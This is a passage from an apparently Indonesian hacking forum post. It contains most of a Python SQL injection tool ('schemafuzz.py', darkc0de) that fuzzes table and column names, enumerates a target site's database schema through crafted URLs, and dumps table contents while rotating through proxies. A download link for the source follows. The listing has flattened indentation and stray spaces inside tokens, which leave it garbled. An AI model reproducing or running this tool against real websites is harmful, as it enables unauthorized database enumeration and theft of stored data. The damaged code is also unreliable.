    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*) ,0x1e,0x20)")
    count_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemat a"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"info rmation_schema".encode("hex")+arg_end
    line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_n ame,0x1e,0x20)")
    line_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemat a"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"info rmation_schema".encode("hex")
    arg_row = "Databases"
    line_URL += arg_eva+"LIMIT"+arg_eva+"NUM,1"+arg_end

    #Uncomment the lines below to debug issues with the line_URL or count_URL
    #print "URL for Counting rows in column:",count_URL
    #print "URL for exploit:",line_URL

    #Fuzz table/columns
    if mode == "--fuzz":
    print "[+] Number of tables names to be fuzzed:",len(fuzz_tables)
    file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
    print "[+] Number of column names to be fuzzed:",len(fuzz_columns)
    file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
    print "[+] Searching for tables and columns..."
    file.write("\n[+] Searching for tables and columns...")
    fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("he x"))+arg_eva+"FROM"+arg_eva+"TABLE"+arg_end
    for table in fuzz_tables:
    try:
    proxy_num+=1
    table_URL = fuzz_URL.replace("TABLE",table)
    gets+=1
    #print "[!] Table Debug:",table_URL
    source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
    e = re.findall("darkc0de", source)
    if len(e) > 0:
    print "\n[!] Found a table called:",table
    file.write("\n\n[+] Found a table called: "+str(table))
    print "\n[+] Now searching for columns inside table \""+table+"\""
    file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
    for column in fuzz_columns:
    try:
    proxy_num+=1
    gets+=1
    #print "[!] Column Debug:",table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")
    source = proxy_list[proxy_num % proxy_len].open(table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")).rea d()
    e = re.findall("darkc0de",source)
    if len(e) > 0:
    print "[!] Found a column called:",column
    file.write("\n[!] Found a column called:"+column)
    except (KeyboardInterrupt, SystemExit):
    raise
    except:
    pass
    print "[-] Done searching inside table \""+table+"\" for columns!"
    file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
    except (KeyboardInterrupt, SystemExit):
    raise
    except:
    pass

    #Lets Count how many rows or columns
    if mode == "--schema" or mode == "--dump" or mode == "--dbs":
    source = proxy_list[proxy_num % proxy_len].open(count_URL).read()
    match = re.findall("\x1e\x1e\S+",source)
    match = match[0][2:].split("\x1e")
    row_value = match[0]
    print "[+] Number of "+arg_row+": "+row_value
    file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
    if mode == "--schema" or mode == "--full" or mode == "--dbs":
    print
    ##Schema Enumeration and DataExt loop
    if mode == "--schema" or mode == "--dump" or mode == "--dbs":
    while int(table_num) != int(row_value)+1:
    #print "table#:",table_num,"row#:",row_value
    try:
    proxy_num+=1
    gets+=1
    #print line_URL
    source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
    match = re.findall("\x1e\x1e\S+",source)
    if len(match) >= 1:
    if mode == "--schema" or mode == "--full":
    match = match[0][2:].split("\x1e")
    if cur_db != match[0]:
    cur_db = match[0]
    file.write("\n[Database]: "+match[0]+"\n")
    print "[Database]: "+match[0]
    print "[Table: Columns]"
    file.write("[Table: Columns]")
    if cur_table != match[1]:
    print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
    file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
    cur_table = match[1]
    table_num = int(table_num) + 1
    else:
    sys.stdout.write(",%s" % (match[2]))
    file.write(","+match[2])
    sys.stdout.flush()
    #Gathering Databases only
    elif mode == "--dbs":
    match = match[0]
    file.write("\n["+str(num)+"]"+str(match))
    print "["+str(num)+"]",match
    table_num = int(table_num) + 1
    #Collect data from tables & columns
    elif mode == "--dump":
    match = re.findall("\x1e\x1e+[\w\d\?\/\_\:\.\=\s\S\-+]+\x1e\x1e",source)
    match = match[0].strip("\x1e").split("\x1e")
    if arg_verbose == 1:
    print "\n["+str(num)+"] ",
    file.write("\n["+str(num)+"] ",)
    else:
    print
    file.write("\n")
    for ddata in match:
    if ddata == "":
    ddata = "NoDataInColumn"
    sys.stdout.write("%s:" % (ddata))
    file.write("%s:" % ddata)
    sys.stdout.flush()
    table_num = int(table_num) + 1
    else:
    if mode == "--dump":
    sys.stdout.write("\n[%s] No data" % (num))
    file.write("%s:" % ddata)
    table_num = int(table_num) + 1
    else:
    break
    num = int(num) + 1
    except (KeyboardInterrupt, SystemExit):
    raise
    except:
    pass

    #Full SQLi information_schema Enumeration
    if mode == "--full":
    while 1:
    try:
    proxy_num+=1
    gets+=1
    source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read()
    match = re.findall("\x1e\x1e\S+",source)
    if len(match) >= 1:
    match = match[0][2:].split("\x1e")
    if cur_db != match[0]:
    cur_db = match[0]
    file.write("\n\n[Database]: "+match[0]+"\n")
    print "\n\n[Database]: "+match[0]
    print "[Table: Columns]"
    file.write("[Table: Columns]")
    table_num=0
    if cur_table != match[1]:
    print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
    file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
    cur_table = match[1]
    table_num = int(table_num) + 1
    else:
    sys.stdout.write(",%s" % (match[2]))
    file.write(","+match[2])
    sys.stdout.flush()
    else:
    if num == 0:
    print "\n[-] No Data Found"
    break
    num = int(num) + 1
    except (KeyboardInterrupt, SystemExit):
    raise
    except:
    pass

    #Lets wrap it up!
    if mode == "--schema" or mode == "--full" or mode == "--dump":
    print ""
    print "\n[-] %s" % time.strftime("%X")
    print "[-] Total URL Requests",gets
    file.write("\n\n[-] [%s]" % time.strftime("%X"))
    file.write("\n[-] Total URL Requests "+str(gets))
    print "[-] Done\n"
    file.write("\n[-] Done\n")
    print "Don't forget to check", dbt,"\n"
    file.close()


    jika terdapat error pada saat eksekusi, source file bisa anda ambil disini:
    Code:
    http://h1.ripway.com/11121989/schemafuzz.py
    error terjadi karena python sensitif dengan jarak spasi horizontal pada tiap baris fungsi/class

Page 1 of 4 1234 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •